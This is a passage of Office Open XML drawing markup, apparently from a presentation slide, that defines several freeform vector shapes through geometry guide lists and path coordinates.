                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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82" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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83" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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23"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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23">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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84" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 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1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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85" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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86" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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87" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
